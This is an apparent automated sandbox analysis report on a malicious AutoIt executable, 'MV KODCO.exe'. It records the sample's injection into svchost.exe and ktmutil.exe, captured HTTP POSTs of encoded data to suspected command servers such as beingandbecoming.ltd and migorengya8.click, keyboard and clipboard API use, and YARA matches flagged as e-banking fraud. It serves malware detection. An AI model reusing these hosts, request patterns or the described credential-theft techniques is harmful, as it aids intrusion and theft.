                Source: unknownHTTP traffic detected: POST /79tr/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Host: www.beingandbecoming.ltdConnection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 199Cache-Control: no-cacheOrigin: http://www.beingandbecoming.ltdReferer: http://www.beingandbecoming.ltd/79tr/User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36Data Raw: 31 48 3d 69 44 51 55 32 4b 54 52 48 6b 51 49 38 74 32 63 56 55 6e 67 47 33 6d 37 43 62 68 33 39 57 50 49 52 36 32 77 2f 55 6d 4b 62 45 69 66 76 6f 5a 79 59 4b 38 48 38 56 68 6f 79 69 64 59 31 63 49 68 64 4c 41 6c 75 57 30 54 69 38 6e 55 65 58 70 51 59 62 39 4e 38 78 39 63 4b 43 4a 74 4b 59 44 50 42 6b 32 63 4d 37 79 68 34 65 55 52 36 2b 71 37 74 32 42 52 4a 48 63 50 4c 63 2f 36 73 38 34 71 6c 41 34 77 4f 6d 73 67 30 43 4a 79 51 4f 4d 63 6e 38 55 52 4d 69 52 56 4d 4f 41 44 4b 30 5a 67 57 71 47 4b 5a 4b 53 74 6b 71 6a 68 36 52 4e 4b 2f 4f 62 79 5a 37 64 33 69 65 6d 4f 63 55 73 6e 6b 77 3d 3d Data Ascii: 1H=iDQU2KTRHkQI8t2cVUngG3m7Cbh39WPIR62w/UmKbEifvoZyYK8H8VhoyidY1cIhdLAluW0Ti8nUeXpQYb9N8x9cKCJtKYDPBk2cM7yh4eUR6+q7t2BRJHcPLc/6s84qlA4wOmsg0CJyQOMcn8URMiRVMOADK0ZgWqGKZKStkqjh6RNK/ObyZ7d3iemOcUsnkw==
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 19 Nov 2024 02:25:16 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Tue, 19 Nov 2024 02:25:54 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
                Source: cMOROZNpvCGcdz.exe, 00000008.00000002.2934945031.000000000527A000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.migorengya8.click
                Source: cMOROZNpvCGcdz.exe, 00000008.00000002.2934945031.000000000527A000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.migorengya8.click/y3dc/
                Source: ktmutil.exe, 00000007.00000003.2165243004.0000000007F8E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: ktmutil.exe, 00000007.00000003.2165243004.0000000007F8E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: ktmutil.exe, 00000007.00000003.2165243004.0000000007F8E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: ktmutil.exe, 00000007.00000003.2165243004.0000000007F8E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: ktmutil.exe, 00000007.00000003.2165243004.0000000007F8E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: ktmutil.exe, 00000007.00000003.2165243004.0000000007F8E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: ktmutil.exe, 00000007.00000003.2165243004.0000000007F8E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: ktmutil.exe, 00000007.00000002.2932130624.000000000323D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                Source: ktmutil.exe, 00000007.00000002.2932130624.000000000323D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
                Source: ktmutil.exe, 00000007.00000002.2932130624.000000000323D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                Source: ktmutil.exe, 00000007.00000002.2932130624.000000000323D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033LMEM
                Source: ktmutil.exe, 00000007.00000002.2932130624.000000000323D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033T
                Source: ktmutil.exe, 00000007.00000002.2932130624.000000000323D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                Source: ktmutil.exe, 00000007.00000002.2932130624.000000000323D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                Source: ktmutil.exe, 00000007.00000003.2157485094.0000000007F6B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
                Source: ktmutil.exe, 00000007.00000003.2165243004.0000000007F8E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: ktmutil.exe, 00000007.00000003.2165243004.0000000007F8E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                Source: C:\Users\user\Desktop\MV KODCO.exeCode function: 0_2_00636B0C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_00636B0C
                Source: C:\Users\user\Desktop\MV KODCO.exeCode function: 0_2_00636D07 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_00636D07
                Source: C:\Users\user\Desktop\MV KODCO.exeCode function: 0_2_00636B0C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_00636B0C
                Source: C:\Users\user\Desktop\MV KODCO.exeCode function: 0_2_00622B37 GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,0_2_00622B37
                Source: C:\Users\user\Desktop\MV KODCO.exeCode function: 0_2_0064F7FF DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_0064F7FF

                E-Banking Fraud

                barindex
                Source: Yara matchFile source: 1.2.svchost.exe.420000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.svchost.exe.420000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000007.00000002.2931811558.0000000002EF0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.1970475170.0000000000420000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.2933217296.0000000003410000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.2933301048.0000000003460000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.2934945031.0000000005220000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.1972961447.0000000005F90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.2933293097.0000000002520000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.1971212248.0000000003250000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

                System Summary

                barindex
                Source: C:\Users\user\Desktop\MV KODCO.exeCode function: This is a third-party compiled AutoIt script.0_2_005E3D19
                Source: MV KODCO.exeString found in binary or memory: This is a third-party compiled AutoIt script.
                Source: MV KODCO.exe, 00000000.00000000.1686385048.000000000068E000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_580b1ce0-2
                Source: MV KODCO.exe, 00000000.00000000.1686385048.000000000068E000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: aSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_3aed3ba0-7
                Source: MV KODCO.exeString found in binary or memory: This is a third-party compiled AutoIt script.memstr_bc48671e-5
                Source: MV KODCO.exeString found in binary or memory: CSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_86459b2e-7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0044C883 NtClose,1_2_0044C883
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F72B60 NtClose,LdrInitializeThunk,1_2_02F72B60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F72C70 NtFreeVirtualMemory,LdrInitializeThunk,1_2_02F72C70
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F72DF0 NtQuerySystemInformation,LdrInitializeThunk,1_2_02F72DF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F735C0 NtCreateMutant,LdrInitializeThunk,1_2_02F735C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F74340 NtSetContextThread,1_2_02F74340
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F74650 NtSuspendThread,1_2_02F74650
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F72AF0 NtWriteFile,1_2_02F72AF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F72AD0 NtReadFile,1_2_02F72AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F72AB0 NtWaitForSingleObject,1_2_02F72AB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F72BF0 NtAllocateVirtualMemory,1_2_02F72BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F72BE0 NtQueryValueKey,1_2_02F72BE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F72BA0 NtEnumerateValueKey,1_2_02F72BA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F72B80 NtQueryInformationFile,1_2_02F72B80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F72EE0 NtQueueApcThread,1_2_02F72EE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F72EA0 NtAdjustPrivilegesToken,1_2_02F72EA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F72E80 NtReadVirtualMemory,1_2_02F72E80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F72E30 NtWriteVirtualMemory,1_2_02F72E30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F72FE0 NtCreateFile,1_2_02F72FE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F72FB0 NtResumeThread,1_2_02F72FB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F72FA0 NtQuerySection,1_2_02F72FA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F72F90 NtProtectVirtualMemory,1_2_02F72F90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F72F60 NtCreateProcessEx,1_2_02F72F60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F72F30 NtCreateSection,1_2_02F72F30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F72CF0 NtOpenProcess,1_2_02F72CF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F72CC0 NtQueryVirtualMemory,1_2_02F72CC0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F72CA0 NtQueryInformationToken,1_2_02F72CA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F72C60 NtCreateKey,1_2_02F72C60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F72C00 NtQueryInformationProcess,1_2_02F72C00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F72DD0 NtDelayExecution,1_2_02F72DD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F72DB0 NtEnumerateKey,1_2_02F72DB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F72D30 NtUnmapViewOfSection,1_2_02F72D30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F72D10 NtMapViewOfSection,1_2_02F72D10
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F72D00 NtSetInformationFile,1_2_02F72D00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F73090 NtSetValueKey,1_2_02F73090
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F73010 NtOpenDirectoryObject,1_2_02F73010
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F739B0 NtGetContextThread,1_2_02F739B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F73D70 NtOpenThread,1_2_02F73D70
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F73D10 NtOpenProcessToken,1_2_02F73D10
                Source: C:\Users\user\Desktop\MV KODCO.exeCode function: 0_2_00626606: CreateFileW,DeviceIoControl,CloseHandle,0_2_00626606
                Source: C:\Users\user\Desktop\MV KODCO.exeCode function: 0_2_0061ACC5 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_0061ACC5
                Source: C:\Users\user\Desktop\MV KODCO.exeCode function: 0_2_006279D3 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,0_2_006279D3
                Source: C:\Users\user\Desktop\MV KODCO.exeCode function: 0_2_0060B0430_2_0060B043
                Source: C:\Users\user\Desktop\MV KODCO.exeCode function: 0_2_0061410F0_2_0061410F
                Source: C:\Users\user\Desktop\MV KODCO.exeCode function: 0_2_006002A40_2_006002A4
                Source: C:\Users\user\Desktop\MV KODCO.exeCode function: 0_2_005EE3B00_2_005EE3B0
                Source: C:\Users\user\Desktop\MV KODCO.exeCode function: 0_2_0061038E0_2_0061038E
                Source: C:\Users\user\Desktop\MV KODCO.exeCode function: 0_2_0061467F0_2_0061467F
                Source: C:\Users\user\Desktop\MV KODCO.exeCode function: 0_2_006006D90_2_006006D9
                Source: C:\Users\user\Desktop\MV KODCO.exeCode function: 0_2_0064AACE0_2_0064AACE
                Source: C:\Users\user\Desktop\MV KODCO.exeCode function: 0_2_00614BEF0_2_00614BEF
                Source: C:\Users\user\Desktop\MV KODCO.exeCode function: 0_2_0060CCC10_2_0060CCC1
                Source: C:\Users\user\Desktop\MV KODCO.exeCode function: 0_2_005EAF500_2_005EAF50
                Source: C:\Users\user\Desktop\MV KODCO.exeCode function: 0_2_005E6F070_2_005E6F07
                Source: C:\Users\user\Desktop\MV KODCO.exeCode function: 0_2_005FB11F0_2_005FB11F
                Source: C:\Users\user\Desktop\MV KODCO.exeCode function: 0_2_006431BC0_2_006431BC
                Source: C:\Users\user\Desktop\MV KODCO.exeCode function: 0_2_0060D1B90_2_0060D1B9
                Source: C:\Users\user\Desktop\MV KODCO.exeCode function: 0_2_0061724D0_2_0061724D
                Source: C:\Users\user\Desktop\MV KODCO.exeCode function: 0_2_0060123A0_2_0060123A
                Source: C:\Users\user\Desktop\MV KODCO.exeCode function: 0_2_005F32000_2_005F3200
                Source: C:\Users\user\Desktop\MV KODCO.exeCode function: 0_2_006213CA0_2_006213CA
                Source: C:\Users\user\Desktop\MV KODCO.exeCode function: 0_2_005E93F00_2_005E93F0
                Source: C:\Users\user\Desktop\MV KODCO.exeCode function: 0_2_005FF5630_2_005FF563
                Source: C:\Users\user\Desktop\MV KODCO.exeCode function: 0_2_005E96C00_2_005E96C0
                Source: C:\Users\user\Desktop\MV KODCO.exeCode function: 0_2_0062B6CC0_2_0062B6CC
                Source: C:\Users\user\Desktop\MV KODCO.exeCode function: 0_2_0064F7FF0_2_0064F7FF
                Source: C:\Users\user\Desktop\MV KODCO.exeCode function: 0_2_005E77B00_2_005E77B0
                Source: C:\Users\user\Desktop\MV KODCO.exeCode function: 0_2_006179C90_2_006179C9
                Source: C:\Users\user\Desktop\MV KODCO.exeCode function: 0_2_005FFA570_2_005FFA57
                Source: C:\Users\user\Desktop\MV KODCO.exeCode function: 0_2_005F3B700_2_005F3B70
                Source: C:\Users\user\Desktop\MV KODCO.exeCode function: 0_2_005E9B600_2_005E9B60
                Source: C:\Users\user\Desktop\MV KODCO.exeCode function: 0_2_005E7D190_2_005E7D19
                Source: C:\Users\user\Desktop\MV KODCO.exeCode function: 0_2_005FFE6F0_2_005FFE6F
                Source: C:\Users\user\Desktop\MV KODCO.exeCode function: 0_2_00609ED00_2_00609ED0
                Source: C:\Users\user\Desktop\MV KODCO.exeCode function: 0_2_005E7FA30_2_005E7FA3
                Source: C:\Users\user\Desktop\MV KODCO.exeCode function: 0_2_01074CF00_2_01074CF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004388F31_2_004388F3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004230601_2_00423060
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004210C01_2_004210C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004301CA1_2_004301CA
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004301D31_2_004301D3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004212001_2_00421200
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0042235D1_2_0042235D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004223601_2_00422360
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00436B331_2_00436B33
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004303F31_2_004303F3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00422B951_2_00422B95
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00422BA01_2_00422BA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0042E46B1_2_0042E46B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0042E4731_2_0042E473
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0044EEA31_2_0044EEA3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FC02C01_2_02FC02C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FE02741_2_02FE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030003E61_2_030003E6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F4E3F01_2_02F4E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FFA3521_2_02FFA352
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030001AA1_2_030001AA
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FD20001_2_02FD2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FF81CC1_2_02FF81CC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FF41A21_2_02FF41A2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FC81581_2_02FC8158
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FDA1181_2_02FDA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F301001_2_02F30100
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F5C6E01_2_02F5C6E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F3C7C01_2_02F3C7C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F407701_2_02F40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F647501_2_02F64750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FEE4F61_2_02FEE4F6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030005911_2_03000591
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FF24461_2_02FF2446
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FE44201_2_02FE4420
